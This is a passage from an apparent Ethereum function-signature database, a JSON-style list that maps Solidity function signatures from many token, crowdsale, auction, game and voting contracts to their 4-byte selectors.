"_fetch(uint256)": "0x8e92aea3", "getPredictions()": "0xc78c3a83", "getWinningPrediction(address)": "0x263ce6a0", "predict(uint16,uint8)": "0x919e144c", "Prediction(uint24,uint24,bool)": "0x1bf049b9", "isTokenVerified(address)": "0xec867b27", "getTokenCount()": "0x78a89567", "_queAmount(uint256)": "0xfe5daae6", "_requireQuePayment(uint256)": "0x035d0880", "changeQuecoinAddress(address)": "0xb146ba8e", "getVote(uint256)": "0x5a55c1f0", "getQuestionAnswer(uint256,uint256)": "0x5e5a77e6", "getQuestionAnswerCount(uint256)": "0x336e24aa", "getQuestionCount()": "0xdd41cc2f", "getQuestionDetails(uint256)": "0x9f8c45cf", "flagAndFinalize(uint256)": "0x6d3f1277", "acceptAnswerAndFinalize(uint256,uint256)": "0xaf6cd244", "answerQuestion(uint256,string)": "0x447e52a0", "askQuestion(string,string)": "0x705b8845", "QuestionStore(address)": "0x5c2e7a13", "testUserCanSignUpAndLogin()": "0x8b1d37d4", "SimpleToken(uint256)": "0x134562a6", "validate(address[4],address,uint256[12],uint256,bytes,uint256)": "0xa79b2752", "DelayedPayment(address,uint256,address)": "0x602cd226", "schedule(address,bytes,uint256[8],uint256)": "0x9fe4712d", "sendBounty()": "0x4bb89c4d", "sendFee()": "0xae39279f", "proxy(address,bytes)": "0xbe6d055a", "initialize(address[4],address,uint256[12],uint256,bytes)": "0xa10ec6e5", "all(bool[6])": "0x5fa77dac", "validateRequestParams(address[3],address,uint256[12],uint256,bytes,uint256)": "0xf260bd94", "createValidatedRequest(address[3],address,uint256[12],uint256,bytes)": "0x1fd9b2a4", "createRequest(address[3],address,uint256[12],uint256,bytes)": "0x5c90b9a8", "RequestFactory(address,address)": "0xf1d89857", "createClone(address)": "0x57894c1b", "play(uint256)": "0x6898f82b", "price(string)": "0xfe2c6198", "balance(address)": "0xe3d670d7", "buy(string,address)": "0xe1a3e55c", "offer(string,uint256,uint256,address)": "0xcae61d2e", "isAuction(string)": "0xb58489ac", "isBuyable(string)": "0x9fdc4d13", "auctionEnds(string)": "0x90e575f5", "bid(string,address)": "0x76d33951", "minimumBid(string)": "0x58441a58", "finish(string)": "0x390eca6b", "auctionStarted(string)": "0x3717798b", "cancel(string)": "0x0b4f3f3d", "invalidate(string)": "0x0846c0ee", "sale(string)": "0x05128716", "calculateNextPrice(uint256)": "0xe08503ec", "listMultipleItems(uint256[],uint256,address)": "0xbaddee6f", "priceOf(uint256)": "0xb9186d7d", "changePrice(uint256,uint256)": "0xb3de019c", "populateFromItemRegistry(uint256[])": "0x8f88aed0", "calculateDevCut(uint256)": "0x65121205", "ownerOf(uint256)": "0x6352211e", "nextPriceOf(uint256)": "0x5ba9e48e", "tokensOf(address)": "0x5a3f2672", "itemsForSaleLimit(uint256,uint256)": "0x5435bac8", "listItem(uint256,uint256,address)": "0x442edd03", "listItemFromRegistry(uint256)": "0x37525ff0", "allOf(uint256)": "0x2e4f43bf", "approvedFor(uint256)": "0x2a6dd48f", "setItemRegistry(address)": "0x1fe8500e", "issueCard(uint256,uint256,uint256)": "0x0c6cd73a", "withdrawAmount(uint256)": "0x0562b9f7", "tokenExists(uint256)": "0x00923f9e", "Transfer(address,address,uint256)": "0xddf252ad", "GetHash(bytes)": "0xb456ecc5", "hashPass()": "0x87f24484", "GetGift(bytes)": "0x181ffc5f", "CashOut(uint256)": "0x9ffa0711", "setLog(address)": "0x4797f21b", "getInvestment()": "0xc3f1a710", "setMinInvestment(uint256)": "0xba7ed2ff", "sumInvested()": "0xa442414f", "minInvestment()": "0x8ac2c680", "calculateDividend()": "0x797d8b85", "loggedTransfer(uint256,bytes32,address,address)": "0x6046d718", "sumDividend()": "0x45cf093a", "PrivateInvestment()": "0x36746413", "payDividend()": "0x0b6826ca", "distributeDividends()": "0x03c83302", "participate()": "0xd11711a2", "forceReseed()": "0x80ca7aec", "init(string,string,address,uint256,uint256,address,uint256,address)": "0xea64faca", "underwrite(uint256)": "0x6be60f8b", "underwrite(address,uint256)": "0x88180ff6", "getConversionFeeAmount(uint256)": "0x2a3c2c56", "setConversionFee(uint32)": "0xecbca55d", "disableConversions(bool)": "0x228d2820", "gasPrice()": "0xfe173b97", "quickConverter()": "0xc31e0547", "gasPriceLimit()": "0x961a929c", "formula()": "0x4b75f54f", "convertibleToken(uint16)": "0xf2c8d247", "convertibleTokenCount()": "0xba9a8b37", "createCloneToken(address,uint256,string,uint8,string,bool)": "0x5b7b72c1", "enableTransfers(bool)": "0xf41e60c5", "destroyTokens(address,uint256)": "0xd3ce77fe", "createCloneToken(string,uint8,string,uint256,bool)": "0x6638c087", "totalSupplyAt(uint256)": "0x981b24d0", "balanceOfAt(address,uint256)": "0x4ee2cd7e", "MiniMeToken(address,address,uint256,string,uint8,string,bool)": "0xa0ed4cff", "getLast4Bytes(bytes32)": "0x18fed50a", "setValidRateDurationInBlocks(uint256)": "0x6c6295b8", "CALLToken(uint256,string,string)": "0xafabe8b4", "getCKOwner(uint256)": "0xdaecc910", "addProposal(uint256)": "0x3fec91a4", "recordVotes(uint256[])": "0x8a54d6a4", "registerProposal(uint256,uint256[])": "0x252cb4fe", "setStorageAddress(address)": "0x59b910d6", "storageAddress()": "0x85aa92a7", "KittyKendoCore()": "0x8e592caf", "getVoterProposal(address,uint256)": "0x095daeb1", "getVoterVotesCount(address)": "0xff5feb3e", "getVoterProposalsCount(address)": "0x236ed5a6", "getProposalVoterVotesCount(uint256,address)": "0x495f9bae", "getProposalVotesCount(uint256)": "0xbc597d9f", "getProposalVotersCount(uint256)": "0xc3b66bed", "getTotalVotersCount()": "0x40066733", "getTotalProposalsCount()": "0x9724fc95", "setVotesPerProposal(uint256)": "0x58480d41", "getVotesPerProposal()": "0xbf7f3cfe", "setProposalTTL(uint256)": "0x2ed1a7f6", "getProposalTTL()": "0x60958192", "updateVoterTimes(address,uint256)": "0xc06f1bc4", "addVoterVote(address)": "0xf72918ef", "addProposalVote(uint256,address)": "0x881abe3e", "voterVotingTime(address)": "0xca8f9651", "proposalCreateTime(uint256)": "0xce709c9b", "proposalOwner(uint256)": "0xfcde9925", "proposalExists(uint256)": "0x1374b22d", "voterExists(address)": "0x75a90144", "updateProposalOwner(uint256,address)": "0x56845ca0", "createVoter(address)": "0x166a3952", "createProposal(uint256,address)": "0x74a9e440", "BitpaintingStorage(uint8)": "0x03f7d4ff", "setOffset(uint256)": "0x01e343db", "setContract(uint256,address,address)": "0x7bf1648a", "denied(address,address)": "0xe53767bd", "allow(address,address)": "0x775ad527", "mintMultiToken(address[],uint256[],uint256)": "0xb1895823", "allocateAngelWheelFinanceToken(address[],uint256[])": "0xeb3f1b61", "allocateCreationInvestmentingToken(address[],uint256[])": "0x01d81121", "allocateCommunityToken(address[],uint256[])": "0x652f78cc", "allocateTeamToken()": "0x7c9677be", "setInitialVaribles(address,address)": "0x76d260bb", "MMONToken()": "0xa04f7bd1", "calcReleaseToken(uint256)": "0xa4d66f1e", "FXTOKEN()": "0x47d9b0aa", "DADCoin()": "0x8e434b82", "periodDuration(uint256)": "0xfd854148", "tokensForPeriod(uint256)": "0x1ff6ad55", "claimAllTokensForInvestor(address)": "0x6803641c", "unclaimedTokens()": "0xc394f6cb", "isPeriodAllTokensSold(uint256)": "0xb2d3e85e", "isPeriodClosed(uint256)": "0xfbeee7e4", "isPeriodTimePassed(uint256)": "0xb406cf39", "periodTimeFrame(uint256)": "0x54c990cf", "BlindCroupierTokenDistribution(address[16],uint256[16])": "0x2dbc62cc", "deposit(address,uint16)": "0xe6deefa9", "getTokensSold(uint256)": "0x57d17805", "getTokenPriceForPeriod(uint256)": "0x44a3982d", "getInvestmentsByCountry(uint16)": "0x624dd6a9", "addPromille(uint256,uint256)": "0x225cfd59", "takePromille(uint256,uint256)": "0xbbe9c7d6", "WIN()": "0xa9b48ba7", "MultiOwnable(address[16],uint256[16])": "0xb8b19c27", "NBAT101(address,address,address,address,address)": "0xd8cff716", "HHH3(string,string)": "0xa8b31f04", "RoscaERC20(uint256,string,string)": "0xc350bbb6", "whitelistContract(address,bool)": "0xa672990c", "getListing(uint64)": "0xeaaff394", "getListingAtPosition(uint64)": "0x5038c9c5", "getListings()": "0xf1b2d6a3", "removeListingInternal(uint64)": "0xa3ea1376", "removeListing(uint64)": "0xa54c2a9a", "getCurrentPrice(uint128,uint128,uint24,uint64)": "0x4eddbd8d", "purchaseCard(uint64)": "0x63de6ad6", "listCard(uint64,uint128,uint128,uint24)": "0x2b0ff02d", "getMarketSize()": "0xfd27b51e", "isListed(uint64)": "0xa9014b0f", "isAvailableForTransfer(uint64)": "0x24fd0a5c", "getRaceMutation(uint32)": "0xb8c9e694", "getMutation(uint32)": "0xe9156cfe", "getSpell(uint32)": "0xc65808b9", "getAttackForCost(uint32)": "0x2a174710", "getCostForAttack(uint8)": "0x3addedd3", "getHealthForCost(uint32)": "0x95dba6c9", "getCostForHealth(uint8)": "0x24417f39", "getNeutralMutationCost(uint8)": "0xc7c8ff35", "getNeutralMutation(uint32)": "0xc50bb446", "getSpellAbilityCost(uint8)": "0xa7177ebf", "getSpellAbility(uint32)": "0xeccaa8b5", "getCostForTrait(uint8)": "0x1c0019c4", "getCostForRace(uint8)": "0x2be2f085", "getTrait(uint32)": "0xedaebc20", "getType(uint32)": "0x12cf8a10", "updateTransferRestrictionVerifier(address)": "0x6e9ffe2b", "manageApprovedMintingModule(address,bool)": "0xd213ed96", "manageApprovedTransferModule(address,bool)": "0x3c2aba9f", "unlockUntradeableCards(address)": "0x45ddcf99", "mintCard(address,uint8[14])": "0xfd6ba459", "assignCardOwner(address,uint64)": "0x5b4f5feb", "removeCardOwner(uint64)": "0xc2490a67", "vestingGrant(address,address,uint256,uint256)": "0x56c38b2e", "processPayment(address,address,uint256)": "0xd1a0cc5c", "pay(address,address,address,uint256,uint256,uint256)": "0x2a54d313", "refundEscrow(address,uint256)": "0x599efa6b", "depositEscrow(address,uint256)": "0xb324e80d", "registerUserBonus(address,address,address)": "0xc5405f17", "registerUser(address,address,address)": "0xed1b71ea", "processRegisterUser(address,address,address)": "0xeb68ce95", "isUserRegistered(address)": "0x163f7522", "isReferralSupported()": "0x45983b24", "getSupportManager()": "0x6a327b7d", "isPlatformOrSupportManager(address)": "0x7da40b65", "isPlatformManager(address)": "0xf5c15237", "setPlatformManager(address)": "0x6818da44", "setCentsExchangeRate(uint256)": "0xfd923a9e", "setWeiExchangeRate(uint256)": "0xdf221223", "isContractAuthorized(address)": "0x103aeda7", "deauthorizeContract(address)": "0x6e861c0e", "authorizeContract(address)": "0x67561d93", "setIcoWallet(address)": "0x3f2e0564", "setReferralSignupTokens(uint256)": "0x05a308fa", "setUserSignupTokens(uint256)": "0x536aace8", "setWinNetworkFee(uint256)": "0xa753fd08", "authorizeIcoBurn()": "0xcd2cde48", "setOperatingStatus(bool)": "0x110466ed", "isOperational()": "0xcd905dff", "transferableBalanceOf(address)": "0xc7d9f4d1", "getTokenAllocations()": "0x45d78d08", "WHENToken(string,string,address,address,address)": "0x63ec3eb5", "SBToken(address,address)": "0xf48b4391", "GreenWorldFarmToken()": "0x99433fc3", "_escrow(address,address,uint256)": "0xc09bdd06", "_cancelAuction(address,uint256,address)": "0xd2235998", "_removeAuction(address,uint256)": "0x95b7f0aa", "_getNftContract(address)": "0xc59f83cf", "cancelAuctionWhenPaused(address,uint256)": "0x1ae6b6ee", "cancelAuction(address,uint256)": "0x859b97fe", "createAuction(address,uint256,uint256,uint256,uint256)": "0x961c9ae4", "getCurrentPrice(address,uint256)": "0x6c54df52", "getAuction(address,uint256)": "0x762a66a2", "AxieClockAuction(uint256)": "0x2ee07cbf", "AdviserCasperToken()": "0xa3a9d67b", "getTargetBlock(uint256)": "0x7bf0cd0d", "getTargetBlocks()": "0x724a8487", "getTargetBlockLength()": "0x01ddc95e", "getBetsEvenAndODD(uint256)": "0xc613089f", "getBlockComission(uint256)": "0x9729f9b9", "getIsRevenuePaid(address,uint256)": "0xff73d2d8", "getIsBlockRevenueCalculated(uint256)": "0x44030e71", "getblockRevenuePerTicket(uint256)": "0x2f45aa21", "getIsParticipate(address,uint256)": "0x309ab7e1", "getoddAndEvenBets(uint256,uint256)": "0x511e2613", "getBlockResult(uint256)": "0x5c61f9b4", "getBetAt(address,uint256)": "0xc6abc298", "getCycleInfo()": "0x873dc71d", "getblock()": "0xd86b3721", "getActivator(address)": "0xcedc01ae", "setMoneyManager(address)": "0x12919d90", "setOwnerWallet(address)": "0xbb542ef0", "removeActivator(address)": "0x51b72a9a", "setActivator(address)": "0x7c0cc0be", "withdrawRevenue(uint256)": "0x0ceff204", "calculateRevenue(uint256,uint256,uint256)": "0xd246b379", "getBlockHashOddOrEven(uint256)": "0xf8e5521a", "calculateRevenueAtBlock(uint256)": "0xe2f36034", "bet(uint8,uint256)": "0x7c695384", "activateCycle(uint256)": "0xb1b5537c", "payTo(address,uint256)": "0x7bf08621", "WoodToken(uint256,string,string)": "0x6e0da3ee", "MetalToken()": "0x00e6b9f8", "BwwToken()": "0x5743cee0", "_withdrawal(address)": "0xd282db01", "calculateFLCCore(address,uint256)": "0x0f3c92f3", "calculateFLC(address,uint256)": "0x73fc9643", "validateToken(address,bool)": "0xe556a08c", "registerToken(address,string,string,uint256,uint256)": "0xece7fa5d", "registerAndValidateToken(address,string,string,uint256,uint256)": "0x42ce0aff", "getTokenByAddress(address)": "0x91ded8fa", "getTokenByIndex(uint256)": "0x644b7a43", "NRB_Tokens()": "0x59dd8f34", "_createRegion(string,address,uint256)": "0x2c01d52b", "getRegion(uint256)": "0x40ba0e94", "createContractRegion(string)": "0x23594797", "createPromoRegion(address,string,uint256)": "0xe258aa02", "RegionsToken()": "0x0e2f94a6", "buyTokens(address,address)": "0x21bc9a55", "setReferralBonusPercent(uint256)": "0x03582fc5", "setBonusPercent(uint256)": "0x62bd689c", "checkLocked(address,uint256)": "0x66e65eb1", "getFreeBalances(address)": "0x0604c594", "unlockAddress(address[])": "0xc974947d", "lockAddress(address[])": "0x3604caa1", "transferEx(address,uint256)": "0x9fe802f1", "_lock(address)": "0x73b1edce", "CYC()": "0x968803e3", "MixenCoin()": "0x6db9ee4d", "mintReservationTokens(address,uint256)": "0x957dcb1e", "initPresaleTokenVault(address[],uint256[])": "0x826e9def", "mintPreAllocatedTokens()": "0x192b3092", "UacCrowdsale(address,address,address,address,address,address,address,address[])": "0xa09d4240", "setWithdrawABIHash(bytes32)": "0xe7d854af", "setTradeABIHash(bytes32)": "0x30230796", "setEtherDeltaFees()": "0xe68a655c", "deleteBytes32(bytes32)": "0x0b9adc57", "getBytes32(bytes32)": "0xa6ed563e", "EthereumUnionToken()": "0x4736786b", "decreaseSupply(uint256,address)": "0x869e0e60", "Arbitrage()": "0x0e0fec9f", "BastoneToken()": "0xf1ecff08", "DKK_Omnidollar()": "0x0975c338", "AvalonToken()": "0xdbfab65b", "Hypercoin()": "0x5b2e299c", "processSellRequest(string,address,uint256,uint256,bool)": "0xb02e8496", "processBuyRequest(string,address,uint256,uint256,bool)": "0xf73f4ebc", "processSellRequestFiat(uint256,uint256)": "0x2c237912", "processBuyRequestFiat(string,uint256,address,uint256,uint256)": "0xd92da722", "processRequest(uint256,uint256)": "0xd3af4dc7", "addSellTokensRequest(string,uint256,uint256)": "0x1af47cc7", "addBuyTokensRequest(string,uint256)": "0xc0675b78", "changeGoldIssueBurnFeeContract(address)": "0x35bfe158", "calculateBurnGoldFee(uint256,uint256,bool)": "0xb34c28de", "calculateIssueGoldFee(uint256,uint256,bool)": "0x265b3e6c", "GoldIssueBurnFee(string)": "0xde6ed7dc", "setRequestProcessed(uint256,uint256)": "0x503b64c0", "setRequestFailed(uint256)": "0xdb4844f3", "getRequestBaseInfo(uint256)": "0x90dbf4fc", "addSellTokensRequest(address,string,uint256,uint256)": "0x9bb84cd0", "addBuyTokensRequest(address,string,uint256,uint256)": "0xce73b41a", "releaseMyVestedTokens()": "0xf7e77e44", "isVestingSet(address)": "0xcf462616", "setVesting(address,uint256,uint256,uint256,uint256)": "0x2a2eddde", "TokenVesting(address)": "0x96d811b7", "setStartAt(uint256)": "0xf3a133a9", "preallocate(address,uint256,uint256,uint256,uint256,uint256,uint256)": "0xa527096e", "setDefaultWhitelistVestingParameters(uint256,uint256,uint256,uint256,uint256)": "0x556cbc03", "setAllocateAgent(address,bool)": "0x26493a6f", "Mineable()": "0x5294409f", "addressIsOwner(address)": "0xcea65e97", "GanaTokenLocker(address,address)": "0x35126330", "GanaToken()": "0xb537488c", "MRDSPrivateSale()": "0x8abb0e1f", "MRDSCoinToken()": "0xff84990c", "Tfarm()": "0x4874a41f", "OHGRiverResort()": "0x87d570c0", "ZipToken()": "0xc43782e0", "getContributorInfo(address,string)": "0x697ca8bf", "deliverRewardedTokens(address,uint256,string)": "0x572bcfe1", "StarbaseMarketingCampaign()": "0xd9f02210", "safeIncrement(uint256,uint256)": "0x26093bbc", "IAMEPrivateSale()": "0x2cea905a", "Rpct()": "0x96937617", "addToCategorie2(address,address)": "0xccd8ead7", "addToCategorie1(address,address)": "0x0da3bec6", "settokenCap(uint256)": "0x03fad66e", "setbonusDate(uint256)": "0xb14959dc", "ASStokenICO(address)": "0xd5b8a884", "ASStoken(string,string,uint8,uint256,uint256)": "0x13e003dd", "FightClockAuction(address,uint256)": "0x9aff301f", "AGAVE(string,string)": "0xad35dcd3", "Alphacoin()": "0x29b6cdd5", "hasExpired()": "0x90e64d13", "expiryTimestamp()": "0xade6e2aa", "getBidIds()": "0xda9d56d7", "calcAmtReclaimable(address)": "0xd213f109", "calcCurrentMinBid()": "0xceacc749", "bid(string,string)": "0xa4f2613d", "manuallyEndAuction()": "0xd3946ea4", "ETHT()": "0x8a8b98dd", "RichGoldToken()": "0xbe4cbafd", "KEKEcon()": "0x4727925a", "HenryToken()": "0x271d9090", "KangEOS()": "0x3e0912ec", "multiTransfer(address[],uint256)": "0xa16a3179", "ZilleriumPresale()": "0xa03b66e5", "ZilleriumPresaleToken()": "0x0333d4a2", "KMCToken()": "0x38dc25d1", "initambassadorsbags()": "0x12c61a20", "Proof_of_Tacos()": "0xfeb27ac9", "getKnowledgeSinceLastUse(address)": "0x0323cc33", "getMyKnowledge()": "0x71892e3f", "getMyFranklin()": "0x81981f7c", "calculateKnowledgeBuySimple(uint256)": "0xc6041333", "calculateKnowledgeBuy(uint256,uint256)": "0x13574cd2", "calculateKnowledgeSell(uint256)": "0xedd21840", "buyKnowledge()": "0x634ec9f9", "sellKnowledge()": "0x9a71825e", "useKnowledge(address)": "0x28cbe9ac", "transferFromTo(address,address,uint256)": "0x579952fc", "transferFromTo(address,address,uint256,bytes)": "0xb4ad6b5b", "setCodeSize(uint256)": "0xd4caf2a4", "lockupAccounts(address[],uint256,uint256)": "0x5d06a05c", "freezeAccounts(address[],bool,bool)": "0xa4055f62", "removeAuthorized(address)": "0x485d7d94", "enableRenounceOwnership()": "0xd5c4098d", "LiftUpVets(string,string,uint8,uint256)": "0x6fa9e255", "Tipcoin()": "0xdecb4803", "CraigGrantEatDick()": "0x01250e4d", "withdrawRemaining(address)": "0xfd0cdcdb", "getInitialOwners()": "0x9c15b047", "SMRDistributionVault()": "0x36e9f43f", "_setPermissionManager(address,address,bytes32)": "0xd63bed4c", "checkOracle(address,address,address,bytes32,uint256[])": "0x4900b48c", "evalParam(bytes32,uint32,address,address,bytes32,uint256[])": "0xf1e2ac12", "_saveParams(uint256[])": "0x59ce0bb8", "_setPermission(address,address,bytes32,bytes32)": "0x7a899cdc", "_createPermission(address,address,bytes32,address)": "0x750a96ac", "evalParams(bytes32,address,address,bytes32,uint256[])": "0x1b5e75be", "hasPermission(address,address,bytes32)": "0x6d6712d8", "getPermissionManager(address,bytes32)": "0xb1905727", "getPermissionParam(address,address,bytes32,uint256)": "0xa03c5832", "getPermissionParamsLength(address,address,bytes32)": "0x15949ed7", "removePermissionManager(address,bytes32)": "0xa885508a", "setPermissionManager(address,address,bytes32)": "0xafd925df", "revokePermission(address,address,bytes32)": "0x9d0effdb", "grantPermissionP(address,address,bytes32,uint256[])": "0x6815c992", "grantPermission(address,address,bytes32)": "0x0a8ed3db", "createPermission(address,address,bytes32,address)": "0xbe038478", "canPerform(address,address,bytes32,uint256[])": "0x2a151090", "BaseFareCalculator()": "0xf481d2d0", "TokenDistributionMock(uint256)": "0x566e78fe", "getCurrentLocation()": "0xd27bf2e3", "dropTo(string)": "0xa229090a", "CarRoute(string)": "0x3f18acb4", "addFromMapping(uint256,uint256)": "0x48d597e5", "saveTokenValues()": "0x6331eae0", "calc(uint256)": "0x38c9027a", "doPurchase(address)": "0x0665c82b", "finalWithdraw()": "0x11f2a395", "LiveStarsTokenPresale(uint256,address,address,uint256,uint256,uint256,uint256,uint256)": "0x915ed87e", "LiveStarsToken()": "0x1a0b4656", "toString(bytes32)": "0xb11a19e8", "quantidadeDeAutorizacoesNecessariasParaUmaNovaOuvidoriaPoderSeCadastrar()": "0xa595f2eb", "quantidadeDeAutorizacoes(address)": "0x2b2f88a8", "cadastrar(bytes32,uint8,bytes32,bytes32,int256)": "0xd7b1bb22", "autorizadoraNuncaAutorizouCandidata(address,address)": "0x5532edf2", "isOuvidoriaCadastrada(address)": "0x5b15afb6", "autorizar(address)": "0x635da243", "getOuvidoriaEnteNome(address)": "0x2d5132cd", "getOuvidoriaEnteTipo(address)": "0x75d7036b", "getOuvidoriaEndpoint(int256,address)": "0x512202d7", "getOuvidoriaNome(address)": "0x5b196dae", "getContaOuvidoria(uint256)": "0x27d95c8c", "getNumeroDeOuvidorias()": "0x3cdb982b", "toTipoEnte(uint8)": "0x6539335a", "inserirOuvidoriaNoCadastro(address,bytes32,uint8,bytes32,bytes32,int256)": "0xcf279ff1", "CatalogoOuvidorias(bytes32,uint8,bytes32,bytes32,int256)": "0xe888e445", "testCanFinalizeEndedSale()": "0xd10e10b3", "throwsWhenHittingHardCap()": "0x4b5c0234", "testHardCap()": "0x1c135881", "testFinalizingBeforeCapChangesHardCap()": "0x030e6b98", "testCanFinalizeOnCap()": "0x0383966b", "throwsWhenFinalizingWithIncorrectCap()": "0xcd7da845", "testCantFinalizeWithIncorrectCap()": "0xf421e02b", "throwsWhenFinalizingIfNotMultisig()": "0xd3ba95ce", "testCantFinalizeIfNotMultisig()": "0xfe98f1d1", "throwsWhenFinalizingNotEndedSale()": "0x099f40a9", "testCantFinalizeNotEndedSale()": "0x7692c4d8", "test_updateKey_zeroNewKey()": "0xf8ec7e83", "test_updateKey_decreaseNoHint(int256)": "0xdbb173d9", "test_updateKey_increaseNoHint(int256)": "0xf93fc97b", "test_updateKey_missingId()": "0x39799e5d", "updateOwners(address,address[],uint256,uint8[],bytes32[],bytes32[])": "0x111eaba0", "reconcile(address[],int256[],uint8[],bytes32[],bytes32[])": "0x601d3910", "setTokenContract(address,uint8[],bytes32[],bytes32[])": "0x94c77969", "setAllowances()": "0xdbd9a4d4", "calculateWinners()": "0x011bc2e1", "quickSortBids()": "0xd2f82026", "searchAddress(address)": "0xa20f46c6", "getBid(uint256)": "0x3c889e6f", "getBidsLength()": "0xd879914a", "OpenBids(address,uint256,address,address,uint256,uint256)": "0x25672ee6", "TestTokensMigration(address)": "0x9ee94556", "getUserTaskAtIndex(address,uint256)": "0x70732188", "getUserAddress(bytes32)": "0x4a4e8884", "getUserListSize()": "0xdd45e247", "isUsernameTaken(bytes32)": "0x2a49222b", "updateUser(bytes32,bytes32,bytes32,bytes32,bytes32)": "0x4da2906b", "addUser(bytes32,bytes32,bytes32,bytes32,bytes32)": "0xdc79c2ef", "withdrawBounty()": "0x2cf4e56f", "TokenSyndicate(address,uint256,uint256,uint256,uint256)": "0xf216b203", "enqueue(address)": "0x8f807f6b", "dequeue()": "0x957908d1", "checkPlace()": "0xad7d59fc", "qsize()": "0x3e3c9eae", "Queue(uint256)": "0x9711e944", "removeLogic(address)": "0x4ac79795", "addLogic(address)": "0x79ef704e", "frozenAccountForLogic(address)": "0x13a92f02", "freezeAccountForLogic(address,bool)": "0x46683308", "setAllowance(address,address,uint256)": "0xda46098c", "BSTokenData(address)": "0x9312766d", "fundTransfer()": "0x29700653", "IndieGameToken(string,string,uint8,uint256,address)": "0x7428eed3", "changeBankAddress(address)": "0x82ca116d", "closeDown()": "0x5a4362e5", "numberOfAccounts()": "0x0f03e4c3", "getAccountNumber(address)": "0x8efbd512", "return_rejected_payment(uint256)": "0x8a43fc7e", "notify_payment_reject(uint256)": "0x791b1150", "reject_payment(uint256,bytes32)": "0xb8991ffb", "HVAL()": "0x2ccf8d40", "saiTap()": "0x9bc64cc8", "bonusETH()": "0x736a0102", "smallSize()": "0xdc11be24", "dTRIGGER_NEXTWEEK_TIMESTAMP()": "0xe525c3d8", "get_rate()": "0x533178e5", "proof_of_public_key()": "0xa4c97967", "muscFundDeposit()": "0x52d28a17", "is_purchase_allowed()": "0x3fd01a77", "STAGE1_TIME_END()": "0x76ea430a", "WLMWallet()": "0xd7bdaaa6", "reffalPool()": "0xf3f9c004", "tempMngr()": "0xcc86566c", "announcedTimeStamp()": "0x7da25928", "LIQUID_ALLOCATION_PPM()": "0x6bf0a3bf", "EXT_COMPANY_STAKE_TWO()": "0x39e84cef", "TBowner()": "0x8a468e15", "frozenBalanceCount()": "0x91f5637a", "buyWildcardToken()": "0xa7e45699", "ReinvestAmount()": "0x9798dfc2", "receiveEth()": "0x4185f8eb", "nextContributionCap()": "0x2aabb48e", "isConstructedOwned()": "0x38649b2a", "payableFinneyReceived()": "0xae6f1db6", "maxTicketAmount()": "0xa284b6d3", "disableNewStakes()": "0x04b5723d", "timeOut()": "0x614d85e1", "STAKE_APR()": "0xe25b5cbd", "isBCFBuyMarket()": "0x5ee7cd23", "freezeTokensAmount()": "0x11506970", "queryCost()": "0xfd557d39", "minGamePlayAmount()": "0x8da1e722", "batchlimits()": "0x66bb83b6", "newModerator()": "0xc41addb5", "PRICE_PREICO()": "0x8c06fa18", "tokenLock()": "0xe718234d", "checkInterest()": "0x9a52b339", "starbaseEpAmendment()": "0x715eddda", "lastMineralUpdateTime()": "0xb83a1bdc", "pauseOffset()": "0x2344acdf", "add_bounty()": "0x63d74226", "btcUsdRate()": "0x3535ab2a", "HONORABLE_LOSS_BONUS()": "0xd6a3b623", "weiSoftCap()": "0x11e21245", "CryptoHoleToken()": "0xb7fcc321", "icoEndAt()": "0xa5ef69ea", "totalDelegations()": "0x05b9cb3c", "End7()": "0x583ed080", "lastUpdated()": "0xd0b06f5d", "minPurchaseQty()": "0xee2b78a1", "affirmations()": "0x12a2716d", "EdgarRichardWunsche()": "0x85f16544", "supplyInCirculation()": "0x149b8690", "isOneToken()": "0xd65a16c0", "operationalAddress()": "0x78e03373", "CPLPrivate()": "0x3690fd03", "lastUsdPerEthChangeDate()": "0xb989915c", "getItemsLength()": "0x194f4795", "advisorsTokensThirdReleaseTime()": "0x6c1d4fd9", "unitStake()": "0x2a8a8ebb", "disbursementDuration()": "0x7872e3da", "PHXTKNADDR()": "0x4a1a89f1", "THIRD_TIER_SALE_START_TIME()": "0x691ed382", "donationsAddress()": "0xd6c2479a", "lottoBalance()": "0x805c733b", "blacklist()": "0xa4b5fa56", "totalTokensDestroyed()": "0x59912df1", "thirdWeekMainICOBonusEstimate()": "0x99bcb1a1", "interestEarnedAccount()": "0x5fcf0455", "ALLOC_SALE_GENERAL_2()": "0x2a022f22", "lastBlock_a16()": "0x7322dccd", "cao()": "0x2f94afba", "HUT34_WALLET()": "0x979d6dc7", "MAX_GAS()": "0x5f2a9f41", "contributorsCurrentPeriod()": "0x871e5fac", "getTokensDistributeds()": "0x630061f3", "sys()": "0xae422c09", "buildPrice()": "0x2cab00de", "foundersTokensAddress()": "0xdbf81cc6", "reserveMember()": "0x30e8b963", "shareholdersWalletAddress()": "0x30a1d746", "ALLOC_ILLIQUID_TEAM()": "0x565cee48", "default_rate()": "0x85e870b3", "presaleAmountETH()": "0xa08b1447", "salesActive()": "0x4a6bfa2d", "minimumSpend()": "0x428f180c", "total_withdraw()": "0x9a8318f4", "communityUnvested()": "0x4d16dd41", "totalVestedBalance()": "0xa15d59ce", "tokensOwner()": "0x34309e97", "minSpend()": "0x48dddca8", "regulatorApprovedKycProvider()": "0x080fd28a", "supplyReady()": "0xcb5cf43f", "privGoal()": "0xbb09adbb", "twentyThirtyVault()": "0x9a3d1f3f", "GetTime()": "0x18c5e502", "marketingRecipient()": "0x35a3a96f", "reg()": "0x738fdd1a", "deathData_a14()": "0x3b442edf", "finalPot()": "0xa110d350", "_assertAmount(uint8,uint256,uint256,uint256,uint256,uint256,uint256,uint8,uint256)": "0x497dbce9", "_max(uint256,uint8,uint256)": "0x6c57dbaa", "_lockOrUnlockAmount(uint24,uint256,uint256,uint256,uint256,uint256,uint8)": "0x6866da59", "_nextAmount(uint8,uint256,uint256,uint256,uint256,uint256)": "0x3111dcfd", "_getWinAmount(uint8,uint8,uint8,uint24,uint256,uint256,uint256,uint256,uint256)": "0xb99c2b51", "settleGame(uint256,uint256)": "0x9ff93088", "temp(uint256,uint256,bytes32,bytes32)": "0x8ed9be36", "placeGame(uint24,uint256,uint256,uint256,uint256,uint256,uint256,uint256,bytes32,bytes32)": "0xd0c7b012", "victorieumICO1Token()": "0x41863a7d", "HamsterToken()": "0x7434e60d", "AIMcoin()": "0xf0aadcda", "transferToken(address[],uint256[])": "0xe07f0f5e", "showUserPoolAddresses(address)": "0x774190dd", "showLastPoolAddress(address)": "0xcf071005", "createDataRequest(address,address,uint256,uint256)": "0xc857a88c", "acceptRequest(address)": "0x2b8cc346", "OKEToken()": "0xafe948ce", "T()": "0x2bc80f3a", "Technology3GCrowdsale(uint256,address,address)": "0x0d278a8b", "Technology3G(address)": "0xa242519b", 